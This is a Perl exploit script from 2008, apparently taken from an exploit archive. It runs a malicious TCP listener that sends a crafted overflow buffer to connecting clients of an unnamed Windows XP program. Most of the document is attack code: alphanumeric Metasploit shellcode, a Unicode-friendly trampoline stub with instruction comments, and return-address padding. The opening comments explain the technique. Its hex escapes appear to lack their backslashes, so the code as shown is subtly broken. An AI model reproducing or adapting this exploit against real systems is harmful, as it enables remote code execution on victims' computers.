# k`sOSe - 08/24/2008 # This is a useless and not portable exploit code, tested only on my winxp-sp3 VM.
# I was looking for a vuln to write an exploit for when I found this PoC:
#
# http://www.milw0rm.com/exploits/5817
#
# The author wrote:
# "The reason why there isnt any shellcode here is because the client is
# coverting the junk/buffer data to unicode so its corrupting the shellcode,
# ive tried sending unicode buffer but the same problem occurs.
# if anyone else can get further please let me know. but i doubt you can"
#
# It is for this reason, a small suggestion of impossibility(copyright Phantasmal Phantasmagoria)
# that i decided to write this. Actually it was pretty funny :)
#
# The first problem is how to redirect the execution flow to our buffer, the buffer can be found
# at three different locations:
# - at some address on the stack converted to unicode
# - at some address on the heap again converted to unicode
# - at some address on the heap in plain ASCII
#
# Unfortunately none of these addresses are unicode friendly :(.
# But.. there is an address on the stack that points in the middle of the buffer(the one on the
# stack), all we need is to pop the stack 6 times and then return.
# To achieve this we return 2 times on a unicode friendly pop,pop,pop,ret.
#
# The second problem is that the buffer on the stack is converted to unicode(so x41 -> x00x41)
# *and* must be, with some exceptions, in the x01 -> x59 space... so I decided to write a
# unicode friendly ASM stub that will load the address of the ASCII version of the buffer in EAX
# using offsets from a register(somewhat related to our buffer), push it and then return.
#
# On my box this works 100 times out of 100 :) use warnings;
use strict;
use IO::Socket; my $sock = IO::Socket::INET->new( Proto => 'tcp', LocalPort => '16667', Listen => SOMAXCONN, Reuse => 1 ); my $ret = "xa2x41" ; # pop, pop, pop, ret # metasploit shellcode
my $shellcode =
"x50x59x49x49x49x49x49x49x49x49x49x49x51x5a" .
"x56x54x58x33x30x56x58x34x41x50x30x41x33x48" .
"x48x30x41x30x30x41x42x41x41x42x54x41x41x51" .
"x32x41x42x32x42x42x30x42x42x58x50x38x41x43" .
"x4ax4ax49x4bx4cx4bx58x50x44x45x50x45x50x45" .
"x50x4cx4bx47x35x47x4cx4cx4bx43x4cx45x55x44" .
"x38x45x51x4ax4fx4cx4bx50x4fx45x48x4cx4bx51" .
"x4fx47x50x43x31x4ax4bx47x39x4cx4bx50x34x4c" .
"x4bx43x31x4ax4ex46x51x49x50x4cx59x4ex4cx4b" .
"x34x49x50x42x54x44x47x49x51x48x4ax44x4dx43" .
"x31x49x52x4ax4bx4cx34x47x4bx46x34x46x44x44" .
"x44x43x45x4ax45x4cx4bx51x4fx51x34x43x31x4a" .
"x4bx43x56x4cx4bx44x4cx50x4bx4cx4bx51x4fx45" .
"x4cx45x51x4ax4bx4cx4bx45x4cx4cx4bx45x51x4a" .
"x4bx4dx59x51x4cx47x54x44x44x48x43x51x4fx50" .
"x31x4cx36x45x30x50x56x42x44x4cx4bx47x36x46" .
"x50x4cx4bx51x50x44x4cx4cx4bx44x30x45x4cx4e" .
"x4dx4cx4bx43x58x45x58x4cx49x4cx38x4bx33x49" .
"x50x43x5ax46x30x45x38x4cx30x4dx5ax44x44x51" .
"x4fx42x48x4cx58x4bx4ex4cx4ax44x4ex51x47x4b" .
"x4fx4ax47x47x33x47x4ax51x4cx50x57x50x49x50" .
"x4ex50x44x50x4fx46x37x46x33x51x4cx42x53x42" .
"x59x44x33x44x34x43x55x42x4dx47x43x50x32x51" .
"x4cx43x53x45x31x42x4cx45x33x46x4ex45x35x42" .
"x58x45x35x43x30x45x5ax41x41";
# Black magic unicode friendly ASM stub that will load the shellcode address
# using offsets from a register that points near the shellcode.
my $trampoline = "x52" . # push edx
"x42" .
"x58" . # pop eax
"x42" .
"x55" . # push ebp
"x42" .
"x44" . # inc esp
"x42" .
"x44" . # inc esp
"x42" .
"x59" . # pop ecx
"x42" .
"x41" . # inc ecx
"x42" .
"x41" . # inc ecx
"x42" .
"x41" . # inc ecx
"x42" .
"x41" . # inc ecx
"x42" .
"x41" . # inc ecx
"x42" .
"x41" . # inc ecx
"x42" .
"x41" . # inc ecx
"x42" .
"x41" . # inc ecx
"x42" .
"x41" . # inc ecx
"x42" .
"x41" . # inc ecx
"x42" .
"x51" . # push ecx
"x42" .
"x4c" . # dec esp
"x42" .
"x59" . # pop ecx
"xec" . # add ah,ch
"x42" .
"x50" . # push eax
"x42" .
"x5e" . # pop esi
"x42" .
"x51" . # push ecx
"x42" .
"x44" . # inc esp
"x42" .
"x58" . # pop eax
"x42" .
"x54" . # push esp
"x42" .
"x5b" . # pop ebx
"x42" .
"x56" . # push esi
"x42" .
"x4B" . # dec ebx
"x42" .
"x4B" . # dec ebx
"x42" .
"x4b" . # dec ebx
"x42" .
"x4b" . # dec ebx
"x42" .
"x48" . # dec eax
"x42" .
"x48" . # dec eax
"x42" .
"x48" . # dec eax
"x42" .
"x48" . # dec eax
"x03" . # ADD BYTE PTR DS:[EBX],AL
"x03" . # ADD BYTE PTR DS:[EBX],AL
"x03" . # ADD BYTE PTR DS:[EBX],AL
"x03" . # ADD BYTE PTR DS:[EBX],AL
"x42" .
"x58" . # pop eax
"x42" .
"x44" . # inc esp // realign stack pointer
"x42" .
"x44" . # inc esp // realign stack pointer
"x42" .
"x50" . # push eax
"x42" .
"xc3" ; # ret my $buf2 = $shellcode .
"x41" x (784-length($shellcode)) .
$trampoline .
"x62" x 158 .
$ret .
"x41" x 6 .
$ret; while(my $client = $sock->accept()) {
print $client "$buf2rn";
}